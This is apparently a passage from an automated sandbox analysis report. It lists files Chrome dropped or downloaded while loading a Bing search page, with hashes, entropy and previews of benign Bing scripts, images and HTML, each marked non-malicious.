                                                                                                      SHA-512:D38DCFD5F8C950EF28395B0903B665F497500A38DB9724A76CE8A870FB026A5235C4EC1873FBF7D1C0D0BD77DAD0708FAEFAADB0A984308129CC082E26D646CC
                                                                                                      Malicious:false
                                                                                                      Preview:!function(e,t){if("object"==typeof exports&&"object"==typeof module)module.exports=t();else if("function"==typeof define&&define.amd)define([],t);else{var n=t();for(var r in n)("object"==typeof exports?exports:e)[r]=n[r]}}(this,(()=>(()=>{"use strict";var e={7294:(e,t,n)=>{n.d(t,{o:()=>i});const r=JSON.parse('{"versions":{"all":"1.0.2","medallion":"1.0.2","medallion-mobile":"1.0.0","edge-update":"1.0.0"},"env":{"name":"PROD"},"apiServer":{"falconBaseUrl":"https://rewards.bing.com","snrBaseUrl":"https://bing.com"}}');class i{}i.settings=r},477:(e,t,n)=>{var r;n.d(t,{I6:()=>s,Z3:()=>o,bc:()=>a,pQ:()=>r,zL:()=>i}),n(2953),function(e){e.Medallion="medallion",e.MedallionBalance="medallion-balance",e.MedallionMedalCircled="medallion-medal-circled",e.MedallionMedalCircledAnimated="medallion-medal-circled-animated",e.MedallionMedalDailyCheckInProgress="medallion-medal-dailycheckin-progress",e.MedallionMedalDailyCheckInCompleted="medallion-medal-dailycheckin-completed",e.MedallionMedalGoalTrack
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=6, xresolution=86, yresolution=94, resolutionunit=2, software=GIMP 2.10.18, datetime=2020:04:16 19:04:38], progressive, precision 8, 160x160, components 3
                                                                                                      Category:dropped
                                                                                                      Size (bytes):3791
                                                                                                      Entropy (8bit):7.08266375441937
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:6lg111b8TUEfN/R5Cx2ftlv8Zkj81vPZsYf:0g11u5FR5CUtlkZPRKY
                                                                                                      MD5:299A479A2F7F1F30D09545CA8CC5D162
                                                                                                      SHA1:871F9E79AD73AAD0B3E0AD1B5B6B87FE837B16CE
                                                                                                      SHA-256:B314EAD01E8E89C964273418BB1117D24DFE01E4838E7A1B46FA19F64699AF05
                                                                                                      SHA-512:9D8DA9F1247D5D097E8AAAB4346AADE12E2BC74D6F9446760A5A3A45D9C2D48782D456CE05AC6FD2F0572CD26A562F2D0E4C55048FDAEC138F398A715743437D
                                                                                                      Malicious:false
                                                                                                      Preview:......JFIF.....H.H......Exif..II*...............V...........^...(...........1.......f...2.......t...i...............H.......H.......GIMP 2.10.18..2020:04:16 19:04:38.......................ICC_PROFILE.......lcms.0..mntrRGB XYZ .........7.,acspMSFT...................................-lcms................................................desc... ...@cprt...`...6wtpt........chad.......,rXYZ........bXYZ........gXYZ........rTRC....... gTRC....... bTRC....... chrm...4...$dmnd...X...$dmdd...|...$mluc............enUS...$.....G.I.M.P. .b.u.i.l.t.-.i.n. .s.R.G.Bmluc............enUS.........P.u.b.l.i.c. .D.o.m.a.i.n..XYZ ...............-sf32.......B.......%.......................nXYZ ......o...8.....XYZ ......$.........XYZ ......b.........para..........ff......Y.......[chrm..............T|..L.......&g...\mluc............enUS.........G.I.M.Pmluc............enUS.........s.R.G.B...C...........................#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C...........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 142367
                                                                                                      Category:dropped
                                                                                                      Size (bytes):49911
                                                                                                      Entropy (8bit):7.994516776763163
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:1536:vr2T/J/l2R6ACJVMQPYmlBXTm12g9bcKo0y0ci:CzJ/lG2KQzBjm1b3ci
                                                                                                      MD5:9B96CC09F9E89D0334BA2FBC22B5197A
                                                                                                      SHA1:B5FE69F39E9F61FEF88DF794F02DC4F4086E2592
                                                                                                      SHA-256:E6331018533143C411BAE25326AB52FCED541C48674551AEA78E750855BDCD1D
                                                                                                      SHA-512:2BDD71A34A7D6172AD4B7B6CF077A891D6266C148000EEF8345E2343E6C21ED8783B2EA328EF3BF7176462A3CA575D2D6D4B55A07138CFD1B02900C95F61077D
                                                                                                      Malicious:false
                                                                                                      Preview:...........m[.8.0........OL....;w.....a.....\N.......h.r~........=........,..JU.......T~.l..?..y..2.X9.|xvP9...TN.......?.....qe.OE.~Gn,.J.T....0......r..#.V&Qx_I.De.._.8.+S?N..HL..J......%O..S........(=.gO.|.T.0......6.. ..y....x..*..8..p.T"1...|$.Cz..V.D%.Ie.F....^."..5....c...?..T8..._..b.gs.4....S]kDZ..7.J.V..l}..?.....c...g.A...8.......8.VB..*....^..f..O.*... ...`...H.{.$. OP..S..AC.gVE.I8..).-U.....R...A..%.T[...Fc{..49..If...y.'w.Q}..oz..v.....W...pp..%..G.+.r:.A.*.....[.:..s.?U......_............k.y0.U....+I5..0.>.Q%.".w.....O....5w..;.;.>..mr.k53r.......k.0.I.<.D......d&...c..jhE..zx.]....y|W....i...`.. .k.P...@.Uq.\;..1............z|.O..Y5..........XtR,....R...k3..<.*.\.2.>.;T..$...kj.5-.i?/..YH`!jb..Z..=.&.L..F...([..y....K5pzQ.>i.1.......0..P...@...L.".n.x..Cj?..w.:+...n..4..H.. .*....S.....h*....8....v.l.[M.0..q..c;.....0*..*.8.......l.TM..n "..km..S.<.T..].k.+1.....P.V...4-W.C....0-/.S;.w......K.z+...DZ....=q.E.@ .Dv.z...@.d.#tE...
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (10077), with no line terminators
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):10077
                                                                                                      Entropy (8bit):5.3656127544424095
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:2KchVqrW2s8uu5Mc/RiEVCqAbmGevp+1JUpqtCTHcC+FOXFvHYH7lK0f9Tk47jUB:2KchVGW2se5MKiEVwmiup9+UXRHQ7lKl
                                                                                                      MD5:BF0CCA35DCA6862F227A308A1093624F
                                                                                                      SHA1:D16DC418E22DD37A6A0D304AC9B7DB12C9A1DFA4
                                                                                                      SHA-256:43431D5B3D022E0E5B7B7EB1B1745F90E845545B909C9AB8FFB37302EAAC113D
                                                                                                      SHA-512:0226E0DF2FF18C9B6B0057F8621AE9EAA2334677232CF21F00BFE9761DF95E0430B797985347A7F6BCB7BD23B3653B1BF0443D821125DC82250F2E521F8DDDF8
                                                                                                      Malicious:false
                                                                                                      URL:https://r.bing.com/rp/0W3EGOIt03pqDTBKybfbEsmh36Q.js
                                                                                                      Preview:var bepns=bepns||function(n,t){function ai(){var n=this;sj_be(_w,"message",ki,!1);vi();sj_evt.bind("OpenGoBigFlyout",function(){return a(null)},1);sj_evt.bind("OpenGoBigFlyoutL2",tr,1);f&&sj_be(f,"click",a,!1);sj_evt.bind("AutoOpenFlyout",function(){k=!0;p||!p&&nr()>=1200?l(r,"b_hide")?lt(n.evt,!1):w=fi:w=ei;w&&typeof LightLogger!="undefined"&&LightLogger&&LightLogger.logInstrumentationV2(null,LightLogger.InstrumentationEventType.Init,ui,!0,{SuppressionReason:w})},!0);sj_evt.bind("AutoOpenFlyoutHide",function(){i&&o(null,!0,!1)},!0);sj_evt.bind(rt,bi);sj_evt.bind("onP1",wi,1);sj_evt.bind("id:refreshed",yi,1);window.addEventListener("click",function(){o(null,!1,!0)})}var yt="redDotControl",pt="rh_meter_leaf_homepage",wt="rh_meter_leaf",bt="givemuid_heart_homepage",kt="GiveMuid",dt="GiveSerp",gt="hub_apps_698b01b4-557a-4a3b-9af7-a7e8138e8372",ni="SUCCESS",v="_RwBf",ti="aad",ii="lka",ri="lkt",g="ard",y="rwspotlight",nt="rt-chevr-nf",ui="AutoOpenFlyoutSuppression",fi="BepFlyoutMissingOrNot
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (10033), with CRLF line terminators
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):12895
                                                                                                      Entropy (8bit):5.210985282362867
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:VbgMOzLnhnvZ1czzHT3L0SKZp2NbltyQEZxAk/MkhBMDIkFi2o6XJalZW:9OZrSzz3wp0OxAQjEl
                                                                                                      MD5:51F2DA314598BA3376DBC1429B27A103
                                                                                                      SHA1:6BD3DF8D4EEA73683BFB9D9B9AC780BC9C85687F
                                                                                                      SHA-256:429C376160336DC6F748E45C07DDC068B24635F25A816F9A23D2AC733AAD914F
                                                                                                      SHA-512:942F4D3E5F9F303F0290347EA8689CCC79DA68D7A08AB1447BBE76A62C16534DA9539B617F0669EB2ECB1849384D493A96F65638940A439F526F2CFD00C3DD2B
                                                                                                      Malicious:false
                                                                                                      URL:https://r.bing.com/rp/a9PfjU7qc2g7-52bmseAvJyFaH8.js
                                                                                                      Preview:0;..;..!function(n,l){"object"==typeof exports&&"undefined"!=typeof module?l(exports):"function"==typeof define&&define.amd?define(["exports"],l):l(n.preact=n.preact||{})}(this,function(n){if(n.render){return;} var l,u,i,t,o,f,r,e={},c=[],s=/acit|ex(?:s|g|n|p|$)|rph|grid|ows|mnc|ntw|ine[ch]|zoo|^ord|itera/i;function a(n,l){for(var u in l)n[u]=l[u];return n}function v(n){var l=n.parentNode;l&&l.removeChild(n)}function h(n,l,u){var i,t,o,f=arguments,r={};for(o in l)"key"==o?i=l[o]:"ref"==o?t=l[o]:r[o]=l[o];if(arguments.length>3)for(u=[u],o=3;o<arguments.length;o++)u.push(f[o]);if(null!=u&&(r.children=u),"function"==typeof n&&null!=n.defaultProps)for(o in n.defaultProps)void 0===r[o]&&(r[o]=n.defaultProps[o]);return y(n,r,i,t,null)}function y(n,u,i,t,o){var f={type:n,props:u,key:i,ref:t,__k:null,__:null,__b:0,__e:null,__d:void 0,__c:null,constructor:void 0,__v:o};return null==o&&(f.__v=f),null!=l.vnode&&l.vnode(f),f}function p(n){return n.children}function d(n,l){this.props=n,this.context
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (62609), with CRLF, LF line terminators
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):287742
                                                                                                      Entropy (8bit):5.611935691916058
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6144:tePxB1I0iB4ZLxpz+WBxcbZvBQjmBQ4vHH9HggRPLcZ:twB1IKxpNxcbZvBQjmBQ4iZ
                                                                                                      MD5:C129A0626274E15638F44FB75AF63DCF
                                                                                                      SHA1:3E5D3D83ABF3D0421F284FB9E55A1774F6C9A5E0
                                                                                                      SHA-256:CEB8ABF054FF1271501EEB1F79B290E492C589A8C6DFB1A30ACF6D780159BBB9
                                                                                                      SHA-512:083AF7C48025853152E4547897C036897067C708E5255F50FDCB9BD2534B26E73E5DBAB691C1E33862D3A082AE0FC06B87E94DF5D55A67331EB66B84C562087E
                                                                                                      Malicious:false
                                                                                                      URL:https://www.bing.com/search?q=testac
                                                                                                      Preview:<!DOCTYPE html><html dir="ltr" lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="http://schemas.live.com/Web/"><script type="text/javascript" nonce="GDR/kDRFcPP1R8iaSydFWLQI7ulz0cpOq1/FAYWy14s=" >//<![CDATA[..si_ST=new Date..// </script><head> pc--><title>testac - Search</title><meta content="text/html; charset=utf-8" http-equiv="content-type" /><meta name="referrer" content="origin-when-cross-origin" /><meta property="og:description" content="Intelligent search from Bing makes it easier to quickly find what you.re looking for and rewards you." /><meta property="og:site_name" content="Bing" /><meta property="og:title" content="testac - Bing" /><meta property="og:url" content="https://www.bing.com/search?q=testac" /><meta property="fb:app_id" content="3732605936979161" /><meta property="og:image" content="http://www.bing.com/sa/simg/facebook_sharing_5.png" /><meta property="og:type" content="website" /><meta property="og:image:width" content="600" /><meta pr
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:HTML document, ASCII text, with very long lines (32333)
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):50356
                                                                                                      Entropy (8bit):5.482528482244898
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:768:okuL2ym/YIZE2u16tNz14nO2s2jX5O7JUDWvjygz+YI2QFSOc+YIXFWCPP6bzATf:9Eb5SjyK4FWCqbwONiYb55dq
                                                                                                      MD5:E336951076B064E0ACE17A97A60F53BB
                                                                                                      SHA1:4E7512A628AE82736CB20802209E28748A8C2165
                                                                                                      SHA-256:AD56BE6E4466E1AFBB88C4522A7CAEB7DD94CA0FB1E4DDA0388E55ADD49485B1
                                                                                                      SHA-512:F8291651741DF8A2F3B3B67DC725690D26DF53DEEAF58B362E26A54A92B5F6BE8315C6B044410CB7CBF4AA7E35525563F56119064A2B8529521CE910E3020138
                                                                                                      Malicious:false
                                                                                                      URL:https://www.bing.com/images/sbi?mmasync=1&ig=622FAB4BC2224394A73A643D59292029&iid=.5098&ptn=Web&ep=0&iconpl=1
                                                                                                      Preview:<style type="text/css">#sbiarea,#sbicom{display:none}.hassbi #sbiarea{display:inline-block}#sbiarea{margin:0 0 0 18px}.sbox #sb_form #sbiarea{margin:0}#sb_sbi{display:inline-block;cursor:pointer}img#sbi_b{vertical-align:-2px;height:18px;width:18px}#detailPage #detailheader img#sbi_b,.blue2#miniheader img#sbi_b,.sbox img#sbi_b{vertical-align:-3px}.blue2#miniheader img#sbi_b{vertical-align:-1px}#sbi_b.grayscaled{filter:grayscale(1) brightness(1.4);-webkit-filter:grayscale(1) brightness(1.4)}#sbi_b.grayscaled:hover{filter:grayscale(1) brightness(1);-webkit-filter:grayscale(1) brightness(1)}#sb_sbip[shdlg] #sbi_b{filter:grayscale(0);-webkit-filter:grayscale(0)}#sb_sbip .rms_iac{display:inline-block}#sb_sbip:not(.disableTooltip):hover::before,#sb_sbip.shtip:not(.disableTooltip)::before,#sb_sbip[vptest]::before{bottom:-27px;left:10px;z-index:6}#sb_sbip:not(.disableTooltip):hover::after,#sb_sbip.shtip:not(.disableTooltip)::after,#sb_sbip[vptest]::after{top:40px;left:10px;z-index:4}#hp_contain
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (2784), with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2784
                                                                                                      Entropy (8bit):5.308494593036326
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:elqvTe8ACvyVPzlSJNBIAj+9JpwdPcr7buUiAmiIQ8gZ8ku1U1jm:OqKrPzc77WM0SiIQ32ku1f
                                                                                                      MD5:3A53CCDEE6715AB68CDADA74B043D626
                                                                                                      SHA1:3CD6E53AEBFAFE937E6BB5760FA25C53AEB0D5A2
                                                                                                      SHA-256:75DACDD30B50E24162A626A89636F28FD4851FD6C97EC28A832F2AEFF6919A39
                                                                                                      SHA-512:F33706B9BFDB679CFF063AFFC300DAD03B08CB6F5C921487E7DD97882E8C7E3C33034B9C6F0734DFACCD508CA317BFE68EE96DDC9546A2D43B1E3731FF4F75A6
                                                                                                      Malicious:false
                                                                                                      Preview:var QuickBackRS_Ads_NoAjax;(function(){function s(){var n=_ge("b_results");n!=null&&(t=n.querySelectorAll(k),rt(),tt(),h(o)?sessionStorage.removeItem(o):(sessionStorage[i]&&sessionStorage.removeItem(i),sessionStorage[r]&&sessionStorage.removeItem(r)))}function nt(){var n="sschkad",t="sschvad",i;try{if(typeof Storage=="undefined"||typeof sessionStorage=="undefined"||(sessionStorage.setItem(n,t),i=sessionStorage.getItem(n),sessionStorage.removeItem(n),i!=t))return!1}catch(r){return!1}return!0}function tt(){var l,a,u,s;if(f=h(i),e=h(r),l=h(o),!l&&t&&f&&e){for(n=null,a=-1,u=0;u<t.length;u++)if(s=t[u].querySelector(c),s&&f==s.innerText&&e==u.toString()){n=t[u];a=u+1;break}n&&it()}}function it(){var h=document.getElementById("inline_rs"),p=_ge(v),w,b,l,s,k,y;if(!h||!p){a();return}if(t&&n){if(!ClickBackRSCustomControl)for(w=n.offsetHeight-g,Lib.CssClass.add(n,"qbrs"),n.setAttribute("data-oAH",w+"px"),n.appendChild(h),Lib.CssClass.remove(h,"b_hide"),b=h.offsetHeight,p.style.height=b+"px",l=n.q
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1496
                                                                                                      Entropy (8bit):7.821931333783295
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:Z6Idbelly6IUAFtlM083pL7XjdNAABnfd+9X1++boZZIuiHv04Kq13WrNmii:5ZulCUA/lM0CJEH++biFiP04Kq13ufi
                                                                                                      MD5:4A7889D25CDE7BD9F67F4BEE0889EA5C
                                                                                                      SHA1:CD0A7A8DA725683FF70072B3D44D6FC51867F1FE
                                                                                                      SHA-256:6BB64C51615C8FF3DBBFD3E298D0C1BB068E6D68062B681267A51FBCF72D29CD
                                                                                                      SHA-512:9F7FF727AFD61C6F715A878134FCCF4257C4BB6946CE8A45221C8370890A5EA652E5C80C954EDEFC406BDBD904FA03F70DC22ED9EC9B55B98A9092B1DC11B936
                                                                                                      Malicious:false
                                                                                                      Preview:.PNG........IHDR... ... .....szz.....gAMA......a.....pHYs..........(J....zIDATXG..}L.G.....%3../3.(.....l.2...8.."Zy..R:..../...i..J.B.-.v bW..f.'.U...%Q.,fq.q...=.p.Ri..'....s.}.{.c..?.....~...qO}.m......G7Iw..p....TW{.....o<....Rxs`...^f....0vL.......]B..r...!P.|..;-......:..&0...H..].P>fdf{`l...(F.f......Ax.C..*.YQ..>..H,..r[..e.6.*.{f..6....q...q.=.R...8aW5...Q.R|.;.=.&.!z.TcR[[').wZ....G..&..%%Tb,..'.T.....H.A..._..y.Jj.....o.2...@.e..U..@R....;.......Jt.d&...w....i...oj...Fe{...y.....d...j.~.2.p...Ar......X.E6..n@...(..\.P(|h(Yv...k...._(.,..Eff..;Rw.Y.....X...P.d8j@rn@.Ry../.|..p.A./#...BBW<_.5...../.}.:\0 ....Y.2^[......q"R...3~.......P.....&''.'...[....=........6E...}.lB.,k..-F...>.......y0...p...........wA.G.V.,...2.F..\...5..Y.bu.".O>~)5.?..I.........I."JQ.5...7@..O.8C.k.._...0.w.....Z..i....).Q..3..X...Z..}...9._3.....YgI..'8|..1.....]@}..'.Q6.o0..bu..m\p.......M.9...._.W>...~3.....p..Y.|..-......Av`...ap..C{/.c5.#....I2.L$.,*...
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:SVG Scalable Vector Graphics image
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):743
                                                                                                      Entropy (8bit):4.292467981720158
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:t4rnlWxNl6jK+ndr2tfVxGHryahKJ+mEMd+suVUieeaMiTpkjNLbzGMhcnVUy6o:t4DlcmjmttgHFh/f1DWTpcfsnVx
                                                                                                      MD5:0B42E2B0368746ADA110AEDF526E3052
                                                                                                      SHA1:1A2527A0C4AE0216E410BC4FEC8CAC2F825B3733
                                                                                                      SHA-256:87C3D56D605D537394F149C18D14243531461A7A0948CC0F7418B7B38EF682A0
                                                                                                      SHA-512:22D2842D7BA02B7532832628A9BF180A50C0891CFD9A929763E7C03F34204FB6DEC16D7080E58A07AB7CDFF8AAC1C14D16556E72BFC00DE9CBBA526D1B63EF26
                                                                                                      Malicious:false
                                                                                                      URL:https://r.bing.com/rp/GiUnoMSuAhbkELxP7IysL4JbNzM.svg
                                                                                                      Preview:<svg xmlns="http://www.w3.org/2000/svg" width="33" height="36" viewBox="0 0 33 36" fill="#174AE4">.. <path d="M11.9219 5C10.3082 5 9 6.30817 9 7.92187V29.5781C9 31.1918 10.3082 32.5 11.9219 32.5H22.5781C24.1918 32.5 25.5 31.1918 25.5 29.5781V7.92187C25.5 6.30817 24.1918 5 22.5781 5H11.9219ZM10.7187 7.92187C10.7187 7.25741 11.2574 6.71875 11.9219 6.71875H22.5781C23.2426 6.71875 23.7812 7.25741 23.7812 7.92187V29.5781C23.7812 30.2426 23.2426 30.7812 22.5781 30.7812H11.9219C11.2574 30.7812 10.7187 30.2426 10.7187 29.5781V7.92187ZM15.3594 26.6562C14.8848 26.6562 14.5 27.041 14.5 27.5156C14.5 27.9902 14.8848 28.375 15.3594 28.375H19.1406C19.6152 28.375 20 27.9902 20 27.5156C20 27.041 19.6152 26.6562 19.1406 26.6562H15.3594Z" />..</svg>
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):129811
                                                                                                      Entropy (8bit):5.619465648048296
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:1536:XMRtMQDjoZjZtC58i64oeolxf6DjwrgGUO7BJ7b3gVAvSlqAd+/vwcoOYWddwCit:XMlDjoZjrMadKwrgGTalZY3YW2Z
                                                                                                      MD5:E7E35008D6D94811E9026ACF117D23BB
                                                                                                      SHA1:E2DC282820FC562A637C0637B735FB414A85173A
                                                                                                      SHA-256:CECD9507277624BD8BAAC9FCDBEDE428A6BC827C41635F5B34478C5ABEE4E0BB
                                                                                                      SHA-512:D38DCFD5F8C950EF28395B0903B665F497500A38DB9724A76CE8A870FB026A5235C4EC1873FBF7D1C0D0BD77DAD0708FAEFAADB0A984308129CC082E26D646CC
                                                                                                      Malicious:false
                                                                                                      URL:https://www.bing.com/rewardsapp/widgetassets/prod/medallion/1.0.2/js/widget.js?t=241030
                                                                                                      Preview:!function(e,t){if("object"==typeof exports&&"object"==typeof module)module.exports=t();else if("function"==typeof define&&define.amd)define([],t);else{var n=t();for(var r in n)("object"==typeof exports?exports:e)[r]=n[r]}}(this,(()=>(()=>{"use strict";var e={7294:(e,t,n)=>{n.d(t,{o:()=>i});const r=JSON.parse('{"versions":{"all":"1.0.2","medallion":"1.0.2","medallion-mobile":"1.0.0","edge-update":"1.0.0"},"env":{"name":"PROD"},"apiServer":{"falconBaseUrl":"https://rewards.bing.com","snrBaseUrl":"https://bing.com"}}');class i{}i.settings=r},477:(e,t,n)=>{var r;n.d(t,{I6:()=>s,Z3:()=>o,bc:()=>a,pQ:()=>r,zL:()=>i}),n(2953),function(e){e.Medallion="medallion",e.MedallionBalance="medallion-balance",e.MedallionMedalCircled="medallion-medal-circled",e.MedallionMedalCircledAnimated="medallion-medal-circled-animated",e.MedallionMedalDailyCheckInProgress="medallion-medal-dailycheckin-progress",e.MedallionMedalDailyCheckInCompleted="medallion-medal-dailycheckin-completed",e.MedallionMedalGoalTrack
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (371), with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):371
                                                                                                      Entropy (8bit):4.964799787793963
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:qGD7/TMvKyYLwRMF4owANCqwvpkTzT6n0evROARDCMwzkk6Km0Msv/Gvz:JPwKVDJHCqspkZeZJDC/wKE
                                                                                                      MD5:B743465BB18A1BE636F4CBBBBD2C8080
                                                                                                      SHA1:7327BB36105925BD51B62F0297AFD0F579A0203D
                                                                                                      SHA-256:FEE47F1645BC40FBC0F98E05E8A53C4211F8081629FFDA2F785107C1F3F05235
                                                                                                      SHA-512:5592DEF225E34995F2F4E781F02CC2B489C66A7698D2FEFF9AC9A71F09E5284B6BBDB065E1DF9C06ADFB1F467D5627FBD06E647ABF4E6AB70CF34501232126AD
                                                                                                      Malicious:false
                                                                                                      Preview:var SbiPrivacy;(function(){function t(){var i,r,t,u;if(typeof SbiUtil!="undefined"&&SbiUtil.rt&&_d.querySelectorAll)for(i=SbiUtil.rt.querySelectorAll(".sbiinflnk[data-link]"),r=function(t){var i=t.target;i.hasAttribute(n)&&(i.href=i.getAttribute(n),i.removeAttribute(n))},t=0;t<i.length;t++){u=i[t];SbiUtil.oncop(u,r)}}var n="data-link";t()})(SbiPrivacy||(SbiPrivacy={}))
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                      Category:dropped
                                                                                                      Size (bytes):616
                                                                                                      Entropy (8bit):7.431744986765121
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:6v/7iQ/GqTbNNfx577z3+H6vaoqaCe7Ng/O/YSe+hiRhDfCGfZWQbHEp:xYNfx977+H6vWaDJgW/Y5+hiRU4dEp
                                                                                                      MD5:63343141C64682BD3E0F711730475354
                                                                                                      SHA1:A2A7298E8F58A74292885BAE9A3F44C76C7AA945
                                                                                                      SHA-256:F90E661A7731C97E3478027D07AFD8C86E461C5F379932E15EFAD17D0E96D402
                                                                                                      SHA-512:17F7F14B0C929164283D5FD7BC829D907B923BB12A7B9D6124A6AAC64EB79AAA47163583ACCA91FC71047BB7BB707D649407801C8762D8942A44531DA9559EDF
                                                                                                      Malicious:false
                                                                                                      Preview:.PNG........IHDR... ... .....szz.....sRGB.........gAMA......a.....IDATXG.W.u.0.d.F`.........oF............;.v...8......$.eE1.eY.0...\.;.T@.9.. ..Hv...Z...UN.i$.|.Z...s....4"...b.^..t6..(. ..*...1..r3v.._o....\.. .0.(D...6.g....+.1.......',.?...G..o.%..D.=w.n........".F..]..~n.UM.....f..^.g.._oE'.9:.s.-...t... Q.....z..I....!.'..Q....{...50....j1.p..|..)..V..?.U..b....A.An..9$...S|W"XZ..'`.h...B../.d....{..$p..PL7....\....D..v..F..A.......S"..Q.....W...(..M(..|.6.^.........T.....2...c9.`|...(....%...RJ.==....lnU1})M..v....l.A.>..U........$....kf.`VcD.c.-.Q..x...-1.....^.?zV.r.|......IEND.B`.
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):289
                                                                                                      Entropy (8bit):4.88926455834166
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:2LGXO86zKFddXQOa65Em/L6I38TcqLcUCPrWqpOlZXzPlg3X6:2QO8vzdXmMPTiAiXzC3X6
                                                                                                      MD5:9085E17B6172D9FC7B7373762C3D6E74
                                                                                                      SHA1:DAB3CA26EC7A8426F034113AFA2123EDFAA32A76
                                                                                                      SHA-256:586D8F94486A8116AF00C80A255CBA96C5D994C5864E47DEAC5A7F1AE1E24B0D
                                                                                                      SHA-512:B27B776CB4947EEF6D9E2A33B46E87796A6D4C427F4759C08CF5AA0EE410A5F12E89CA6AB9CDDD86C8471037E3C505F43C8B7FC6D8417F97F9FE3C5C47216BC4
                                                                                                      Malicious:false
                                                                                                      Preview:(function(){if("BroadcastChannel"in window){var t=1,n=new BroadcastChannel("tabCountBroadCastChannel");n.onmessage=function(i){i.data=="newTab"&&n.postMessage("existingTab");i.data=="existingTab"&&t++};n.postMessage("newTab");sb_st(function(){Log.Log("Tab","count",t.toString())},200)}})()
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (6526), with no line terminators
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):6526
                                                                                                      Entropy (8bit):5.372135202911853
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:/CaRENlgVMJhPbrtwyGBdnxEd7NUCuf1bx6gqkJD:aaREXPbOLdxEd7NUnf1twI
                                                                                                      MD5:6904ABA1CE02BB3A01B6550C4BF98A7E
                                                                                                      SHA1:858127221DAF72534247D665BE661A175FAD6DD6
                                                                                                      SHA-256:4492B7EF7F9E30168D8F6410FF6928FCC3019618019116F82B25459B9267B038
                                                                                                      SHA-512:EBD259047BCDED6F925C3184A27D0D197D48B0EE3EBC2C12A27A2C9843B08C551D6DC34C299CD6E4931446F33C1D6BFF3F8CDEB018FB6C614671CF43B6497585
                                                                                                      Malicious:false
                                                                                                      URL:https://r.bing.com/rp/hYEnIh2vclNCR9ZlvmYaF1-tbdY.js
                                                                                                      Preview:var WebResultToolboxBlueV2;(function(){function tt(){var n=_ge("b_results"),t=_ge("b_context");(n||t)&&typeof sa_CTBConfig!="undefined"&&sa_CTBConfig&&(r[b]=ot,r[k]=l,r[d]=l,r[g]=c,r[nt]=c,sj_be(sj_b,"click",function(n){u(n)}),sj_evt.bind("onPopTR",function(n){u(n,!0)}),sj_be(sj_b,"mousedown",function(n){h(n)}),sj_be(sj_b,"mouseup",function(n){h(n)}),n&&s(n.firstChild),t&&s(t.firstChild))}function it(n){return _G.abdef_sarc!=undefined&&n.classList.contains(_G.abdef_sarc)}function s(n){n&&n.nodeType==1&&!it(n)&&(ut(n),s(n.nextSibling))}function rt(n,t,i){for(var r=-1;i--&&r++<n.length;)if(r=n.indexOf(t,r),r<0)break;return r}function ut(n){var y,u,t,c,f,s,l,a;if(n){var r=ct(sa_CTBConfig.toolboxTriggerClassName,n,"span"),h=n.getElementsByTagName("cite"),e=v(n,"u");e&&i(e,"u")[0]==="e"&&(e=null);y=sa_CTBConfig&&sa_CTBConfig.disableMetaData=="1";r&&(h.length||y)&&(u=h.length>0?h[0]:null,n.tt=r,ft(n,e)&&bt(n)&&(t=sj_ce("a"),t.href="#",t.className="trgr_icon",t.setAttribute("aria-label",sa_CT
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (1039), with no line terminators
